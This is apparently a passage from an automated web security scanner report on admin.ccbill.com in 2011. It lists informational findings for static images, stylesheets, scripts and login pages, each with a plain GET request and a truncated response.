HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:07 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "57ea2-5b9-48f3a34a5d140" Accept-Ranges: bytes Content-Length: 1465 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....d.d..... . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_ClientSu |
GET /images/ccb_ClientSu Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:04 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "1680fa4-af0-48f3a34 Accept-Ranges: bytes Content-Length: 2800 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....d.d..... . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_LearnMoreBtn |
GET /images/ccb_LearnMoreBtn Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:05 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "51ebb8-3cb-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 971 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89aL.......N..M..O..M. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_LoginBox |
GET /images/ccb_LoginBox Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:08 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "51ebb9-73e-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 1854 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89aJ.!................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_LoginBoxDiv |
GET /images/ccb_LoginBoxDiv Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:07 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "1680fa7-10c-48f3a34 Accept-Ranges: bytes Content-Length: 268 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a.............!..... ......8{.J..;Z+... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_LoginBoxLeft |
GET /images/ccb_LoginBoxLeft Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:04 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "51ebbb-45b-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 1115 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a................... WM..A@,.4 .D.=..j..P&.. F.qX.$...8.|...... 1.....:..ox..4&.W... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_LoginBoxRight |
GET /images/ccb_LoginBoxRight Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:08 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "57eaa-450-48f3a34a5d140" Accept-Ranges: bytes Content-Length: 1104 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_LoginBoxTop |
GET /images/ccb_LoginBoxTop Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:05 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "1680faa-6ea-48f3a34 Accept-Ranges: bytes Content-Length: 1770 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89aJ.................. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_OnlineSu |
GET /images/ccb_OnlineSu Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:05 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "51ebbe-394-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 916 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....d.d..... . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_OnlineSu |
GET /images/ccb_OnlineSu Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:05 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "30718-3e9-48f3a34a5d140" Accept-Ranges: bytes Content-Length: 1001 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....d.d..... . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_OnlineSu |
GET /images/ccb_OnlineSu Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:06 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "35f28d-359-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 857 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....d.d..... . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_SupportB |
GET /images/ccb_SupportB Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:09 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "57eaf-4bb-48f3a34a5d140" Accept-Ranges: bytes Content-Length: 1211 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89aJ.................. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_SupportBarDiv |
GET /images/ccb_SupportBarDiv Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:08 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "1680faf-45-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 69 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a..c..........!..... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_SupportB |
GET /images/ccb_SupportB Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:08 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "35f290-304-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 772 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a..c................ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_SupportB |
GET /images/ccb_SupportB Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:08 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "51ebc5-310-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 784 Keep-Alive: timeout=5, max=77 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a..c................ ..8.D..; 2...G.%.........h. ! ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_System5Banner |
GET /images/ccb_System5Banner Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:07 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "51ebc6-9df-48f3a34a5d140 Accept-Ranges: bytes Content-Length: 2527 Keep-Alive: timeout=5, max=71 Connection: Keep-Alive Content-Type: image/gif Set-Cookie: TSc23f25=a0a841a24f7 GIF89a..,........GS..... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /images/ccb_System5Bkg |
GET /images/ccb_System5Bkg Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:07 GMT Last-Modified: Wed, 01 Sep 2010 22:27:41 GMT ETag: "1680fb3-6ad-48f3a34 Accept-Ranges: bytes Content-Length: 1709 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....d.d..... . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /js/AC_RunActiveContent |
GET /js/AC_RunActiveContent Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Sat, 23 Oct 2010 00:04:43 GMT ETag: "1690841-22de-4933d8 Accept-Ranges: bytes Content-Length: 8926 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 //v1.7 // Flash Player Version Detection // Detect Client Browser type // Copyright 2005-2007 Adobe Systems Incorporated. All rights reserved. var isIE = (navigator.appVersion ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /js/liveChat.js |
GET /js/liveChat.js HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Sat, 09 Apr 2011 00:20:36 GMT ETag: "d92d0-26a-4a0714fb73d00" Accept-Ranges: bytes Content-Length: 618 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 (function() { var lc_params = ''; var lc_lang = 'en'; var lc_skill = '0'; var lc = document.createElement( var lc_src = (' ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /js/loginJSTools.js |
GET /js/loginJSTools.js?17 HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Sat, 23 Oct 2010 00:04:46 GMT ETag: "169041c-c9a-4933d81 Accept-Ranges: bytes Content-Length: 3226 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: application/x-javascript Set-Cookie: TSc23f25=a0a841a24f7 /* // File: loginJSTools.js - collection of utility functions for newSkin login page // Author: Michael S. // Date: 2/20/2009 */ // hook function to call functions on page load function initPage() { ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /login.cgi |
GET /login.cgi HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 302 Found Date: Tue, 12 Jul 2011 17:14:53 GMT Location: loginMM.cgi Content-Length: 195 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Set-Cookie: TSc23f25=a0a841a24f7 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="loginMM.cgi">here< </body></html> |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /loginIndex.cgi |
GET /loginIndex.cgi HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:01 GMT Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: TSc23f25=a0a841a24f7 Content-Length: 6480 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Conten ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /loginMM.cgi |
GET /loginMM.cgi HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:54 GMT Set-Cookie: JSession=; domain=ccbill.com; path=/; expires=Mon, 11-Jul-2011 17:14:56 GMT Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: TSc23f25=a0a841a24f7 Content-Length: 18889 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <link rel= ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/css/ccbill_style |
GET /style/css/ccbill_style Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Sat, 23 Oct 2010 00:05:00 GMT ETag: "421253-677-4933d82960300 Accept-Ranges: bytes Content-Length: 1655 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSc23f25=a0a841a24f7 /*Header Styles*/ a.links { color: black !important; text-decoration: none !important; font-family: Verdana !important; font-size: 10px !important; } a.links:hover { text-decorati ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/css/default_style |
GET /style/css/default_style Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:14:57 GMT Last-Modified: Fri, 05 Mar 2010 22:45:42 GMT ETag: "4208d8-3347-4811579 Accept-Ranges: bytes Content-Length: 13127 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSc23f25=a0a841a24f7 /* CSS Document */ html { overflow: auto; } body { font-family: Verdana; font-size: 11px; line-height: normal;} a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; co ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/css/images/text-bg |
GET /style/css/images/text-bg Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 404 Not Found Date: Tue, 12 Jul 2011 17:15:16 GMT Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: TSc23f25=a0a841a24f7 Content-Length: 6288 <html xmlns="http://www.w3.org <head> <title></title> <link rel="stylesheet" href="/style/css/default <link rel="stylesheet" href="/sty ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/css/password.css |
GET /style/css/password.css HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:00 GMT Last-Modified: Thu, 20 Aug 2009 00:01:36 GMT ETag: "58035b-1050-4718774 Accept-Ranges: bytes Content-Length: 4176 Keep-Alive: timeout=5, max=85 Connection: Keep-Alive Content-Type: text/css Set-Cookie: TSc23f25=a0a841a24f7 body { font-family: Verdana; font-size: 11px; } a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; color: #1563A2; text-decoration: underline; } .inputLostPass { font-fa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/bg_img.jpg |
GET /style/images/bg_img.jpg HTTP/1.1 Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:02 GMT Last-Modified: Mon, 20 Jul 2009 22:43:51 GMT ETag: "580394-31d-46f2adf35d7c0 Accept-Ranges: bytes Content-Length: 797 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....H.H.....C. . ......................... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/ccbillLogo |
GET /style/images/ccbillLogo Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:15:00 GMT Last-Modified: Sat, 23 Oct 2010 00:05:04 GMT ETag: "1679555-171c-4933d8 Accept-Ranges: bytes Content-Length: 5916 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: image/jpeg Set-Cookie: TSc23f25=a0a841a24f7 ......JFIF.....H.H.....C. ... . .. ........................""""""""""...C ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://admin.ccbill.com |
Path: | /style/images/contac |
GET /style/images/contac Host: admin.ccbill.com Connection: keep-alive Referer: https://admin.ccbill.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213 |
